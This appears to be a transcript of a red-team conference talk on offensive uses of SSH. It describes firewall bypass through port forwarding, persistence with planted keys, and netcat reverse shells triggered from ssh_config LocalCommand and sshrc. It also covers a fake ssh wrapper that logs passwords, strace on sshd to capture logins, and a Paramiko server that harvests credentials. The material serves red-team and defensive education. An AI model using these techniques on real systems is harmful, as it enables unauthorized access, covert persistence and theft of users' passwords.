All right. Gray Hat SSH, or SSH for hackers and red teams. This talk is intended to be a bunch of practical examples of stuff you can do with SSH, specifically that are kind of red teamy or hacker related. I want to thank the Texas Cyber Summit and Red Team Village for hosting this awesome Jungle event and for accepting my talk and letting me come and do this. So let's get into it. First off, my name's Evan. I'm the Director of Offense at Randori. Outside of doing red teaming and offense oriented engagements professionally, I'm also active in CCDC. I'm one of the founding red team members for the National CCDC, as well as I am pretty avid CTFer and kind of into all of the puzzles and games and cool stuff you can do that are attack related. My Twitter is at Syndrome, and come check it out in the Randori channel. I'm going to be in and out of there all day long, so come say hi, and yeah, that's me. So outline for the talk. First, we're going to go over the basics, because I can't really explain a bunch of the command lines without covering some of what you see. Then we're going to go over all of the fun stuff you can do with functionality that's just built into SSH. Then after that, we're going to go over how you can customize SSH and trick users into doing some fun things for you, and in general, just what some of the config files are, where they live, how they work. And then finally, what probably most people are here for, we're going to go through a few different scenarios where you can actually get plain text creds by tricking users into doing things that they are probably not intending to do, or kind of taking advantage of just how the SSH process works. So right from the start, just what is SSH? Let's kind of start at the beginning. So SSH is actually secure shell. It is both the daemon and the client. So there's an SSH service that runs on a server, SSHD. That would be the daemon side. And then the client, which is the command line utility or the GUI or some other client side that speaks SSH that lets me connect to that server and do this functionality. The most common SSH that you're going to run into is OpenSSH, but there's also Dropbear, WinSSH. There's a bunch of different libraries that implement SSH. It's actually pretty common. Originally SSH was intended to replace telnet and RSH, which were both remote administration tools that were plain text. That's obviously problematic if you're connecting to something over the network in plain text. It's really easy to see what's going on and steal passwords, sniff things, etc. So SSH is used to remotely administer systems. It's a replacement for telnet and RSH. Additionally, you can use SSH to upload and download files. Everything's encrypted, which is the goal, right? Make sure that we can securely administer these systems. And the way the SSH protocol was implemented, there's a bunch of encrypted channels that you can open and close. And this allows additional functionality, such as port forwarding, X11 forwarding, and then, of course, the full PTY shell that you get. That's exactly like you're running on the system console. You can do everything that you could do on the console, VI, sudo, control C, all that kind of stuff. And you don't have to worry about your session getting killed or anything like that. So the next obvious question I hear people ask is, well, why is this useful for an attacker? I'm always going after anything that can be used to remotely administer systems. So anything an admin can do, I probably also want to do. So that remote shell access is huge. Port forwarding here is super useful. We'll see some examples of how I can use that to get around network security controls. Downloading and uploading files is kind of obvious. And then the fact that the whole thing is encrypted, while it does protect administrators and people wanting to access systems from getting their information sniffed, It also protects me from getting my information sniffed. So if I'm crossing some sort of boundary that I know is monitored, all of my communications are now encrypted, which makes it that much harder for defenders to be able to watch what I'm doing. This little meme here is kind of perfect. Is it all you need? Well, I do need water and food, but other than that, if I can get access to SSH, I kind of have access to everything I need to do. I just want to call out here, so the SSH clients, right, that you're going to run into commonly are OpenSSH is the one you're going to run into in almost all of the Linuxes. Some of the smaller embedded systems use a thing called Dropbear, and there are other SSH kind of GUIs. And then for Windows, most of the time you're going to see what's called PuTTY, which is the GUI, and then produced by the same people that make PuTTY is a command line tool called Plink that is very similar to the Linux SSH command line tool, in that a lot of these arguments, either the command lines are actually the same or it can do the same functionality that we'll be going over here. And then additionally, we're going to go over some stuff that you can do with a Python project called PARAMIKO, which is a pure Python implementation of both the client and the server side of the SSH protocol. One thing to point out here is SSH is also great because it's really easy to enumerate. So in this top example, I'm just using a pretty simple netcat command to connect to the default SSH port, and I can see that that service is running SSH. It's the 2.0 version of the protocol. It is the OpenSSH server 8.3, and this is running on a Debian system. Since SSH is so simple to enumerate, there is all sorts of awesome scripts, and one of those that I'm showing an example here of is Nmap, where we're running the discovery scripts. You can see kind of the same information we got from netcat, that there's a banner, all of the information for that, and then it's also going out and enumerating all of the different algorithms that SSH supports for doing the encryption, compressing, etc. So that's kind of the what is SSH. Now let's go over some of the basics, or how you use SSH. So the first example here is how I use SSH to just connect to a remote system. So let's say I have Bob's password, or maybe I am Bob, but more likely I have Bob's password. So here, and Bob has an account on 10.10.10.10. So here I say I would like to SSH from my local system to connect as Bob to 10.10.10.10. So that, pretty straightforward, SSH Bob at 10.10.10.10. And then I have a full shell, and I can run who am I, and you can see who I am. I can run any command that Bob has access to run. The next example here is me running a single command. So this is connecting out as Bob to that same server, running who am I, and then I'm just back on my local system. Now, why is that useful? Well, in the top example, if there's someone watching this system or logged into the system, and they are watching who is logged in, for instance, there's a command called who, we'll show you all of the users that are logged in, they're going to see Bob log in. They're going to see the IP address that Bob logged in from. And they might say, hey, why is Bob logging in at 2 o'clock in the morning from some IP address in AWS? That doesn't seem right. And then they're going to catch me, and I'm going to be really sad. So one of the things I can do here, now this isn't foolproof, but it does make it a little bit harder. If I just run these one-off commands, then someone has to run that who command at the exact time that my commands are running. Or there are other commands they can watch, like last and that kind of stuff. But the real takeaway here is this doesn't just show up in who, and you don't, unless you're looking at it at the exact right time, you don't even see the in netstat. You can't even see that there is a connection established. So this is kind of a bit of a OPSEC thing you can do to make it a little bit harder for defenders to find you. Next up, we have copying files. So there's all sorts of reasons why you would want to get a file onto a system or get a file off of a system. But here are just a couple real basic ones. So I'm going to use the utility called SCP, so this is secure copy, and I'm going to SCP from my system the file called malware, and then I'm once again connecting as Bob to 10.10.10.10, and I'm going to store that file in the super non-obvious, not malicious looking at all path of bin not malware. So I'm putting this in a folder that Bob probably runs executables out of, and you can tell it's totally not malware because that's what it says. In the next example, from my local system, I want to copy a file from the remote system that Bob has access to. And I didn't actually say this at the beginning, but the SCP syntax is SCP source and then destination. So in the first example, it's SCP, source is the malware file on my local system, and the destination is the bin not malware as Bob on 10.10.10.10. Here in the second, back to the second example, same thing, it's still source and destination. So I want to copy from the remote system to my system. So I want to copy from Bob at 10.10.10.10 Etsy secret sauce to my local system in loot secret. And then the other thing to point out here is that you can do this recursively. So say Etsy secret doesn't just have sauce, it has a bunch of different files in it that I want to get all of them. I can do scp-r Bob, and same thing, source and destination. So Bob at 10.10.10.10 Etsy secret, and then copy it down into the loot folder. There's actually two ways here to copy SSH that come kind of by default here. So I'm going to go through the other example here, which is SFTP. So this is, just like the other one is secure copy, this is secure FTP. So this is actually a different mechanism. If you get into the SSH protocol, SFTP actually does this a little differently than what SCP is doing. But kind of how you use this is you SFTP Bob at 10.10.10.10, and then I want to get from /secret sauce to /loot secret sauce. So that is from the remote system to my local system. And then in the next example is uploading a file. So I'm going to put from artifacts on malware on my system to not malware, because that's totally secret and no one would ever catch that. And then just like in the previous example, if you want to do something recursively, it's a little different. Like I said, these are SFTP and SCP are implemented a little differently. So the command line options are slightly different. This is -R. I don't know why they didn't use the same. You'll actually notice that SSH has a bunch of command line options and SCP has a bunch of command line options, and those don't all match up perfectly either. But just something to kind of keep an eye on. So that is kind of that is completely the basics. So you can log in and you can copy files. So now let's start looking at the fun stuff you can do with the different functionality that you have to forward ports and various other things here with SSH. So I'm going to start out here with a really basic example here, but you kind of got to understand what's happening. So I am on my little laptop there on the left. I happen to know that the Bob's server of 10.10.10.10 is on the perimeter of this organization called Canary Cannery. Now I can assume there's a bunch of servers inside there potentially. So I want to see what's actually going on inside that network. So unfortunately there's a firewall that's blocking me. I can only see this one system, but maybe from that system I can see other things. So I want to do what's called a local forward. So for instance, maybe I know inside that Canary Cannery there's a system in there that's a web server, and that there's some sort of cool secret on that web server that I would like to get access to. I am going to use SSH to set up a local port on my system. That's port 8080 on the left. I'm going to tunnel that over SSH, so it will send it over the SSH tunnel to that 10.10.10.10 system, and the request will then come out of that system, connect to that server on the inside, and look like, from that system's point of view, look like it's coming from 10.10.10.10. So I am forwarding a port, a local port from my system, to a port on the other side of that SSH box. What that looks like here is, in the top, here's the syntax, so minus capital L, and then that bind address is optional, so we don't have to actually put that part. That's why that's in brackets like that. And then I want to put the local port that I'm going to use, the host I would like that local port to connect to, and the host port that I would like that to connect to. So that is going, or in the command line, that looks like SSH minus L, port 8080 for the local port on my system, 192.168.1.10, which is the IP address on the remote side, and then port 80 because that's the web server. And then I'm going to do that as Bob at 10.10.10.10. And one thing I want to point out here is that $N. That's telling my SSH client to not request a shell on that remote system. Just like before, where I was running single commands so that someone wouldn't be able to just see me in the who output, this minus capital N doesn't request a shell, so you don't actually see that access. The only way you see this is by looking at the SSH logs or by looking at netstat and seeing that there's a weird connection to port 22. Once I have established that connection, so for this example, I just kind of run it in the background with that ampersand, and now I can connect to port 8080 on my local system and make an HTTP request just with curl for this example and grab that secret.txt. And then, as is kind of always how it works for the red team, we win. That's super neat, right? That I can go to one system in there, right? I've bypassed a firewall. That's pretty great with kind of minimal effort. But I don't want to do that for each of these systems. There's all sorts of systems back behind there. I don't know what they're all doing. And if I have to set up this for every single port that happens, I'm going to be sad and be typing quite a bit. So luckily, SSH has thought of that for us and given us this dynamic port forwarding feature. So I can set up with one SSH command on my system a SOX proxy, which is SOX is just a TCP forwarding protocol. So I can set that up so that on my system there is a port. I use 1080 generally because that's kind of the default SOX proxy port. And I can set that up, tunnel that just like the local forward did through that SSH tunnel over that SSH server, and then connect out to any of the systems that are on the other side of that SSH server. So I'm going from, if I connect to this 1080 with something that knows how to speak the SOX protocol, all of my connections actually wind up coming out over here, and I could connect to all of these different servers on their TCP ports and browse whatever they have. So, for instance, a lot of times when I'm doing engagements against an organization and I don't know anything about that organization, I'm going to be looking for wikis or other sources of information about that org so I can figure out what their password schemes are and all that kind of stuff. So it's really useful for me to be able to, instead of just running curl, maybe point a browser at one of these web servers and get access to the information that is on the other side of there. So what does that look like? From the command line, it's actually easier than the other thing that I was doing, in that I just need to use -d, so dynamic, right? And then same thing, the bind address is optional. I don't actually have to say that. And then the port that I want to open up on my system, and then tell it where I'm connecting to. So this is SSH -d, 1080 is the port. Like I said, that's a pretty common SOX proxy port, and then Bob at 10.10.10.10. And then on my system, I will see 1080 as a port that is open. And say I want to use my browser. So this is an example of how you would configure FIREFOX to use a proxy like that. Chrome can also, pretty much any web browser can use proxies like this. But for Firefox, just for simplicity, you can go to Preferences, Network Settings, and then you select manual proxy conf configuration here, and then you tell it, hey, this is a SOX proxy, this is the port there, it's on my local host, and this is on 1080. And then just the default here is SOX 5. I leave it at this. SSH can actually do SOX 4 and SOX 5, but SOX 5 is kind of the newer and does some cool stuff for you, like DNS resolution and that kind of stuff. So now, once this configuration is set, anything I try to go to in this browser will actually go through this system here and come out, or sorry, this system here and come out over here so that you can see that traffic and get access to all of these systems that are here behind this firewall. So I've used this dynamic forwarding to actually get past all of this firewall stuff and essentially hop that boundary into this network, which is obviously pretty useful, hopefully. And then, so that's cool. I have a browser doing it, but maybe I have all sorts of other tools that I want to be able to do, like, I don't know, something with Metasploit or some sort of craziness. One of the other things that you can do here is there are a few different tools, but I like to use this PROXYCHAINS tool. It's pretty easy to configure. So PROXYCHAINS has a configuration file. Same thing here. There's a proxy list. I just tell it, hey, do SOX 5 to localhost at 1080. And then I can here run PROXYCHAINS bash. Now that's going to drop me into an interactive bash shell, and then anything I do in that bash shell will also be sent out over that proxy. So I can use curl, I can use my netcat, anything that's going to talk TCP. You can do PROXYCHAINS in just individual commands, but I find I actually like to just have a shell that's just everything's forwarded. PROXYCHAINS is doing that by kind of hijacking the networking of any of the protocol or any of the binaries that run and injecting the proxy part of that to speak to that proxy for you. So if you do have something that's like a statically compiled binary, it's probably not going to work. But for most things, this will work out pretty good. So that's local forwarding and dynamic port forwarding. That's pretty neat, but maybe say I need to get outside. So let's say this time I'm actually inside of Canary. Maybe I phished someone and I have access to this server here on the right. And they have really good egress filtering, so I can't actually get to the internet, and I'm just completely blocked here. But I can get to this 10.10.10 box where I have SSH access. So I want to download a file, say, on this system that I've compromised. But I don't want to just copy it up to the SSH server and then have it like on the file system so somebody else can find it or get caught in the middle of doing it. I just want this all to happen in one shot. So now I can do what's called a remote port forward. So from me on my box, I will set up where port 8080 on this SSH box actually forwards instead of this way, forwards this way. So if you go to port 8080 here, it actually comes and hits my box on port 8080. So anything that hits this can now hit my system. And then once again, I'll be bypassing that firewall, this time for the egress. So what does that look like? Well, thankfully SSH makes it kind of obvious for us. There's a -R for remote. And then same thing, bind address is optional. I can give it here port, host, and then host port. One thing to point out here is most SSH servers, modern SSH servers, are going to have this, it's called gateway ports, disabled by default. So this will say no in the config file. And all you have to do is change this to yes and then restart SSH. The nice thing about SSH when you restart it is it doesn't kill your existing SSH processes. So if you're logged in via SSH, you can still restart the SSH server. But that lets you bind to what's called the any address, which is 0.0.0.0. So that makes it look like port 80, or it doesn't make it look like, it just actually is. Port 8080 is open on that server just like it's running a service on that server. Instead, it's port forwarded through to your laptop now. So here in the example, I now just set this up. So I say SSH minus capital R, port 8080. I want to bind to that any address. And then it's also port 8080 on the remote system that I want to open up. And then it is Bob at 10.10.10.10. I use that same -n argument so that I don't actually request a shell. Once again, just don't want to make it easy for defenders to find me. And then I set that into the background. For this example, I just start a simple HTTP server because I just want to serve a file from my local system. And then on the remote system, so if you remember, let me go back one here. So this is the remote system now. If I run that curl command, it's going to hit here and then hit my laptop. So you can see here, curl 10.10.10.10 is that remote system. And then I hit that port 8080, I grab the secret, and then once again, we get to win, which is pretty awesome. So that is local, dynamic, and remote port forwarding. Kind of anything you want to do with TCP ports you can make up here. So you can combine these in all sorts of different and interesting combinations. And it is super useful to be able to get around firewalls, hop through networks. You can actually local forward across multiple systems as long as you align all the ports right and get everything pointed in the right direction. So you could actually hop through multiple different firewalls if you wanted to, proxy them all together all the way through. One of the other type of forwardings that you can do here is what's called X11 forwarding. So X11 is what the graphical interface is called on a Unix system. There are two command line options you can do this with in SSH. There's -X and -Y. -Y is the secure version. -X is kind of an older version. At any rate, they work almost exactly the same from a user point of view. But what you can do here is I can run a process on the remote system. And if it has a GUI component, it will actually show up on my Linux box. You can do this with on Mac OS. You can install what's called Xquartz. On Windows, there's a couple different tools you can install that are X11 servers. You have to have your own X11 server running locally. And then once you do this SSH -X, that tells it to forward any of that GUI component back to your system. Here in the example, just for kind of simplicity and to put it on a slide, I launched this Xeyes tool. So this is a little GUI tool that you can launch in Unix systems, and if this was actually live, you would see the pupils follow my cursor around here. But why this is useful, there's a couple different use cases for this that are actually really, really useful. The first is, say that I know that Bob logs into this system and uses the GUI components on the system to do something like browse internal network resources or something that I don't generally have access to. If I have access to a shell on this system as Bob and I do this X11 forwarding, I can forward back any of those graphical interfaces to me with the process running on the remote system. So say, for instance, it's a web browser and Bob, I know, is logged in and stores his cookies to access an internal wiki page or the internal Git repo or whatever internal system that Bob is storing his credentials for. I can launch that browser as Bob and have it come back to me. And if that browser's storing those credentials, then I can just use that browser like I am logged in as Bob. Another thing you can do with this that's kind of fun is you can launch something like Xterm or GNOME terminal or any of those. And then you have, once again, instead of just the SSH session, you have like a full GNOME terminal running on your X11 server. So it's a little bit harder and more confusing for defenders to figure out what's going on because you have essentially like the graphic component of that SSH or that shell running in your local system, which is pretty fun and can be a cool way to keep access to a system when they're killing all of the shells and stuff that you have on the system. So that is the forwarding stuff that I have. Up next, we're going to take a look at some fun that you can have with the config files that work for SSH. So like most Unix systems, there are a bunch of different config files that can do all sorts of craziness with SSH. And it's a little more interesting because there is a server and a client-side component to this. So there are configurations that can change the way the server works and configuration files that can change the way the client works. The first thing I want to take a look at here is what's called authorized keys. So SSH has two ways that it can authenticate users. One is through a username and password. So you SSH and then you type in your password. The other is public and private key. So on my local system, I generate a public and private key. So here as root, which is not the best example, but I run this command called SSH keygen, and that's going to generate the public and private key pair for me and put them in my home directory. If I put the public side of that SSH key into the authorized keys file on the remote system, then during the SSH negotiation, when it's trying to figure out if I'm allowed to log in or not, this is like a really dumbed down version of this, but the client side says, hey, I have this secret, and the server says, I don't believe you, encrypt this with it, and you say, okay, or the client says, okay, encrypts it and sends it back, and then the server decrypts it with the public key and says, okay, cool, that's you did it right, and lets you log in, no password necessary. This is very useful for a bunch of reasons. So say I am on the remote system as Bob because I fished Bob, or I got access to a web server that has a vulnerability in it, or maybe Bob just ran a command for me that has my malicious payload in it, and I want to get access to the system in a more full manner. I can put an SSH key in this authorized keys file, and then I don't even need to know Bob's password to log in. As long as I can control that authorized keys file, I can get in. Additionally, if you were wanting to persist, say someone is watching you do this and is like, hey, Bob's account is compromised, and changes his password. Once again, if you have that authorized keys file, you don't actually need Bob's password to log in. This is very useful for CTFs and challenge type games where you get shell access as someone and you want to escalate that shell and then try to find other privileges. And this is also just super useful in general. If there's any way I can get access to that SSH authorized keys, then I can get access to that remote system without having to really change anything or know anybody's password. The other thing to point out here is there is an authorized keys file that is global, which is in etc SSH. So you can actually set up authorized keys that let you log in as any user or as individual users. And they're in a couple different places, so it's a little bit harder to track down what's going on. The next file here that is very interesting is the known hosts file. So kind of once again, there's it's kind of an overarching how they implement stuff in SSH. There's a global file which applies to everybody, and then a local file that is just for that user. So once I have access to a system, I can look at these known hosts files, and what they are is they're lists of all of the public keys for systems that have been logged into from this system. So I get access to the system as Bob. I only know about that one system. So now I can go and look through these known host files and see the other systems that Bob has access to log into. Now, if I know Bob's password, or if, and Bob is reusing passwords, which we know is bad, but happens all the time still. Or if Bob has that public private key stuff set up, and I can get access to that private key. Now I can log into any of the systems that Bob is logged into, and this is just a list of those systems for me. So really good situational awareness for when I get access to a system and I'm trying to figure out what other systems I have access to. I can just go and look at this file, and then I don't even have to try his credentials on a bunch of different systems and make a bunch of log files that say login failed and all that kind of stuff. I can just go log into the systems that he has access to log into, and it doesn't even look weird from this point because now I'm just logging in as him from a system that he has logged into before. And that is known hosts. There's one thing to point out. A lot of modern systems actually have this so that the IP address is hashed. You can actually turn that off though. So in etc SSH config, there is an option to turn that off. So let's talk about SSH config a little bit. This lets us tell SSH, the command line, what to do. So there's kind of two file structures here. There's etc SSH config, and then you'll actually see etc SSH SSHD config. SSHD is for the daemon, and SSH config is for the command line argument. Most of the time you're going to see SSHD and SSH, just the client, installed side by side, so that can be a little confusing. It lets us do a bunch of cool things, so we can configure all sorts of stuff with the SSH config, both for us to not have to type stuff a lot, and if you want to do interesting things for the user or really kind of trick the user into do interesting things for you. Once again, there's a global version of this, which is etc SSH SSH config, and then there's the user version of this, which is the .sh config. So obvious question here, what are some of the things, some of those cool things that you can do with SSH? So let's kind of start with a simple version here, or really like this is how you'll see this used a lot. So maybe I now want to call that hostname 10.10.10 just bounce. So I'm going to say, hey, this host is bounce, and I want to log in as the user Bob. The hostname, like I said, is 10.10.10.10. I want to do a local forward of 10.80 to 192.168.10.80. I want to do a dynamic forward. So these are all forwards that we saw before of 1080. And I want to do a remote forward of 8080 to 192.168 1.10 on 8080. So if I just did SSH bounce, now it would go through and look up all of these configs and just do all of this for me. So all I have to type is SSH bounce, and I don't have to type in any of those command line options or any of that. The SSH will just figure out that that's actually what I wanted to do. It's kind of neat, right? Less typing, but that's not really really all that useful for getting more access to stuff, is it? No. So let's use SSH config to do something cool. Let's say that I know someone is going to log in, or Bob is going to log into this SSH server, or from SSH server to another system on that canary network. I want to use the SSH config, and what I can do here is configure it such that other commands get run when Bob runs SSH to connect to that system in Canary. So what that would look like here is when he SSHs out, then I run another command to give me a shell that connects back to me. And now I have a shell as Bob on the 10.10.10 server. Say I lost access to the system. They decided to remove the authorized keys. Maybe they missed that I have this set up in the SSH config for Bob. And once again, you can put it in either the user's config or the global config. So as long as I have that 4141 listener set up on my box, whenever Bob SSHs out to that other system, I get a shell from his original system. And how I would do that in the SSH config is pretty straightforward. Here I'm doing it for any of the systems that Bob tries to log into. The first thing I have to do is to, I don't know why this is set up like this, but you have to permit it to run local commands, which is also a configuration. And then the local command that I would like to run is just a netcat -e for bin bash, and to my listener IP on 4141, and then I background that, so it's just going. In Bob's worldview, he SSHs to any of his systems, doesn't see anything else happen, and then I get a netcat listener that has spawned and connected back to me. So that's actually pretty useful. Another very useful config file here is what's called the RC file. There's a global, which is etc SSH SSHRC, or there's the user version, which is .sshrc. And this runs a command on the system when right before it drops to shell as the user. So when I log into a remote system with SSH, this command runs on that remote system and gives me a shell, or runs the commands and then drops to a shell for the user. So what I want to do is use this to spawn a shell. So what that looks like here is same thing. Say Bob is logging into this system here on the top, and I've had access to that system on the top. I set up that RC file such that whenever Bob logs in, it's going to spawn a netcat shell back to me on my listener, and I don't have to do anything. It actually gets triggered when Bob logs in. And that is also a pretty simple thing to accomplish, and that looks like this. So in the .sh for whatever user, I just specify the command that I want to run, and then at the end I ampersand it. So when Bob SSHs via the blue line to that top server, then before Bob gets his shell, but blind to Bob, a shell gets spawned back to me as Bob, and then it drops into Bob's environment. So those are some of the cool things you can do with the config files. There's a bunch of other stuff you can do. I always recommend going and checking out the man pages and playing around with it. But let's get into kind of the fun here. So how would I steal creds? So now there's a couple different things that I want to steal creds from. Let's say up first, I know that Bob is SSHing to other systems in the network. I just want to know what his password is. Maybe I don't even want to spawn any more shells. I don't have access to any of those systems. He doesn't have SSH keys set up, anything like that. I just need to get what Bob's password is when he's doing this. There's actually a pretty fun way that I have done this in the past, and it works surprisingly well, which is I'm just going to make a little shell script. So this is kind of probably the most basic version of this. This is really just so I could fit this on the slide, but this actually would work if you wanted to do this. So where I'm putting this in user local bin, because I happen to know from the way Bob's environment is set up that this comes before user bin in his path. So I make a file that's just called user local bin SSH. I'm just going to go through this line by line real quick. So after the shebang, the first thing I'm going to do is when someone runs this is prompt them for the first argument to this file and then say password and try to get that password. And whatever they give me, I'm going to take the first argument and that password and echo it just into a file called temp.creds, because it's super secret, and then drop a new line and then just rerun it with the original SSH command. And what this looks like to the user is Bob is going to try to SSH out to the remote system, and then he's just going to get prompted twice. So, hey Bob, what's your password? Nope, what's your password? And then it's going to look exactly the same to Bob. So you'll see, hey, welcome to whatever system he's logged in. And now if we were to exit that, then we can see in temp.creds we have Bob's password. So it's a pretty simple way, but super effective to steal the credentials for plain text credentials for a user. I don't have to crack anything or do anything crazy. Depending on how they have their path set up and all of that stuff that's going on, then just get plain text creds, and that's kind of always the goal. So the next scenario here that I want to go over is, how do I get creds when I know someone's logging into a system that I have full access to? So once I have full access to a system, you can't trust any of the processes or anything that's going on here. So this is one example of when I know someone is SSHing into the system that I'm on, I can use debugging tools. So here in this example, I'm going to go ahead and find the process for SSHD, and then I'm going to do what's called strace, which looks for all of the syscalls that happen in that binary and just spits out what they are. I'm going to filter on the strace because I happen, just from knowing how the SSH protocol works, I'm looking for reads. So it's reading the password from whoever is on the remote side. And then I'm going to go ahead and grep for this little special magic here, which is /f/0/0/0. So that is carriage return, or it's carriage forward, I think, and then it's null, null, null. These are the way that it's kind of not showing you the thing as the user types in. So this is, in full disclosure here, there's a lot of info here, and you have to kind of dig through to find these passwords. But once again, you'll find that plain text password of the user or the password. Nothing to crack, just full passwords. So be very reticent to log into systems that you know are compromised. Another version of this here. So I was talking about PARAMIKO. PARAMIKO is a full Python implementation of SSH, both the server and the client. So let's say I'm on a system and SSH is not running on that system, but I know that people are logging into things willy-nilly, or maybe processes are logging into things willy-nilly on a network. I can write my own SSH server, and then I don't even have to go through all that nonsense with strace and digging through log files or anything. So this is the most basic example that I could make of this, and you can make this way more complicated and realistic looking, but for demonstration purposes here, what I'm doing is I have a server interface, which is a PARAMIKO server interface, and I've made my own check auth method here, and this will get called with the username and the password that the user is trying to log in with, and is responsible for checking that username and password are correct. So then I just go ahead and set up a socket. I tell it to listen on port 22, which is the default. I listen for a connection, and then kind of just set all of that up and get it ready to go. But the important thing here is that check auth, and that is doing the username and password. What this looks like in practice is you just start the Python server, and then anything that tries to log into you, here I just did it as localhost for an example, but you would probably get an IP address from somewhere else. You can see it log in, you can see the username, and you can see the password. So that is a bunch of the fun stuff that you can do with SSH. So just kind of go over again why SSH is useful. I get a remote shell to the system that I'm interested in. That's always going to be useful. I can port forward and essentially get to anything else that system is on the network with, and bypass any sort of firewall rules and get around any sort of egress filtering and that kind of stuff. I can download and upload any kind of files that I want. All of those communications are encrypted and pretty hard for defenders to be able to see. And then additionally, people seem to trust SSH a lot and will just log into it, and as you saw, give it their passwords. And the only thing SSH doesn't give me is water and food. And that is why I think SSH is awesome. It's kind of just check us out. Randori, we've got our Twitter account for the Randori attack team. Randori.com careers. We are looking for people that are interested in that kind of stuff. And then our blog, Randori TTPs. And yeah, check it out. And then last, I will leave you with this. Did my webcam make me look fat? Feeling a little out of shape. I've been sitting in my house a long time. So let's make this red team fit. All right. Thanks.